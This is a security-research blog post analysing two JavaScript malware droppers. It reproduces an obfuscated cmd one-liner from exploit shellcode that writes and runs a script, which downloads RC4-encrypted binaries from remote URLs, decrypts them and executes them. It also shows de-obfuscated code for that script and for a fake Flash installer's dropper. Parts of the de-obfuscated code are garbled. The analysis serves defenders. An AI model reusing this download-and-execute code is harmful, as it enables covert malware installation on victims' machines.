Skip to content
June 12, 2015 / Vadim Kotov

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario the shellcode would download and execute a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. Droppers’ main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching would probably be process hallowing. Recently we found a couple of curious specimen that does not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of those lately.

One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^<l.length;i++){v=h(m(2),l[i],k[0]);z=0;var s=g("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");f=a.GetTempName();s.Type=2;s.Charset="iso-8859-1";s.Open();d=v.charCodeAt(v.indexOf("PE\x00\x00")+23);x1=".\x65x\x65";s.WriteText(v);if(31^<d){z=1;f+=".dll"}else f+=x1;s.SaveToFile(f,2);z^&^&(f="regsvr32"+x1+" /s "+f);s.Close();"cmd"+x1+" /c "+f,0);w1.Sleep(u*2)}}}catch(q){}df();function r(k,e){for(var l=0,n,c=[],q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&255,l=l+c[b]^&255,n=c[b],c[b]=c[l],c[l]=n,q.push(String.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&255]));return q.join("")}function su(k,e){k.setRequestHeader("User-Agent",e)}function h(k,y,j){var e=g("WinHttp.WinHttpRequest.5.1");e.SetProxy(0);e.Open("\x47E\x54",y,0);su(e,k);e.Send();if(200==e.status)return r(e.responseText,j)}function df(){a.deleteFile(w1.ScriptFullName)}function g(k){return new ActiveXObject(k)};>wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

It’s actually a one liner that creates a JavaScript file and launches it using wscript. The de-obfuscated JavaScript code looks like this:

var w = new ActiveXObject(&quot;WScript.Shell&quot;),
    a = new ActiveXObject(&quot;Scripting.FileSystemObject&quot;),

try {
    rc4_key = WScript.Arguments(0)
    URL = WScript.Arguments(1)
    user_agent_string = WScript.Arguments(2)

    separator = &quot;***&quot;;


    var n = request_and_decrypt(user_agent_string, URL, rc4_key);

    if (n.indexOf(separator) &gt; 3) {
        k = n.split(separator);
        l = k[1].split(&quot;;&quot;);

        for (var i = 0; i &lt; l.length; i++) {
            v = request_and_decrypt(user_agent_string, l[i], k[0]);
            is_dll = 0;
            var s = new ActiveXObject('ADODB.Stream');
            filename = a.GetTempName();
            s.Type = 2;
            s.Charset = &quot;iso-8859-1&quot;;

            pe_chracteristics = v.charCodeAt(v.indexOf(&quot;PE\x00\x00&quot;) + 23);

            if (31 &lt; pe_charactersistics) {
                is_dll = 1;
                filename += &quot;.dll&quot;
            } else {
                filename += &quot;.exe&quot;;

            s.SaveToFile(filename, 2);

                filename = &quot;regsvr32.exe /s &quot; + filename);


  ;cmd.exe /c &quot; + filename, 0);




} catch (q) {}


function RC4_decrpyt(k, e) {
    for (var l = 0, n, c = [], q = [], b = 0; 256 &gt; b; b++)c[b] = b;

    for (b = 0; 256 &gt; b; b++) l = l + c[b] + e.charCodeAt(be.length) &amp; 255, n = c[b], c[b] = c[l], c[l] = n;

    for (var p = l = b = 0; p &lt; k.length; p++) b = b + 1 &amp; 255, l = l + c[b] &amp; 255, n = c[b], c[b] = c[l], c[l] = n, q.push(String.fromCharCode(k.charCodeAt(p) ^ c[c[b] + c[l] &amp; 255]));

    return q.join(&quot;&quot;)


function request_and_decrypt(user_agent_string, URL, rc4_key) {

    var request = new ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);
    request.Open(&quot;GET&quot;, URL, 0);
    request.setRequestHeader(&quot;User-Agent&quot;, user_agent_string)

    if (200 == request.status)
        return RC4_decrpyt(request.responseText, rc4_key)


After 6-minute sleep the script will download an RC4 encrypted text file containing URLs of malware binaries. It decrypt the list and for each entry downloads, decrypts and executes the corresponding binary. The same RC4 key is used for all the downloads. Before launching a binary it checks the PE header to determine if it’s an EXE or a DLL. In ther former case it will issue:

cmd.exe /c .exe

in the latter:

regsvr32.exe /s .dll

After that the script will delete itself. We could assume certain benefits of this approach:

  1. It might trick some HIPS or pro-active AV modules
  2. The binaries are encrypted – therefore the chances of network detection are scarce
  3. The URLs of malicious binaries are not hardcoded – they are easily configurable

Interestingly we saw a similar dropper in an EXE as well. A fake Flash Player installer from hxxp:// is an EXE that shows clean on VirusTotal (permalink). It creates a JavaScript file and batch script. Here’s the de-obfuscated JavaScript:

(function(c) {
    function a(a, b) {
        if (!b || !a) return null;
        b = e[&quot;ExpandEnvironmentStrings&quot;](b);
        var d = WScript.CreateObject(&quot;Msxml2.XMLhttp&quot;);;GET&quot;, a, !1);
        var c = new ActiveXObject(&quot;ADODB.Stream&quot;);
        with(c) return Mode = 3, Type = 1, Open(), Write(d[&quot;responseBody&quot;]), SaveToFile(b, 2), Close(), b

    fso = new ActiveXObject(&quot;Scripting.FileSystemObject&quot;);
    var e = new ActiveXObject(&quot;WScript.Shell&quot;);
    c = new ActiveXObject(&quot;Shell.Application&quot; );
    FileDestr = e[&quot;ExpandEnvironmentStrings&quot;](&quot;%APPDATA%\\&quot;);

    a(&quot;;, &quot;%APPDATA%\\7winzip.exe&quot;);
    a(&quot;;, &quot;%APPDATA%\\wilndfiles&quot;);
    a(&quot;;, &quot;%APPDATA%\\wilndfile.cmd&quot;);
    a(&quot;;, &quot;%APPDATA%\\wilndfiler.cmd&quot;);

    c.ShellExecute(&quot;cmd.exe&quot;, '/c&quot;' + FileDestr + 'wilndfile.cmd&quot;', &quot;&quot;, &quot;runas&quot;, 0);
    c.ShellExecute(&quot;cmd.exe&quot;, '/c&quot;' + FileDestr + 'wilndfiler.cmd&quot;', &quot;&quot;, &quot;runas&quot;, 0);


It downloads 4 files from and notice that these are HTTPS connections again rendering traffic filters useless. The files are:

  1. exe – a instance of 7zip
  2. wilndfiles – a password protected 7z archive
  3. cmd – a batch script
  4. cmd – a batch script

After that it executes both scripts. First one unpacks the archive and launches malware, second – cleans up all the dropper related files. Is this method more beneficial than more traditional droppers? It appears so. Instead of making more sophisticated PE droppers it seems rational to just switch to JavaScript and use PE as a “dropper” for javascript. Given 0 positives on Virus Total it seems antiviruses do not scrutinize them too well. Of course VirusTotal doesn’t do justice to the antiviruses. Some of them have HIPS modules and various heuristics and could possibly detect it. But still none of them had a signature for this dropper, not even generic one and this should be alarming.

%d bloggers like this: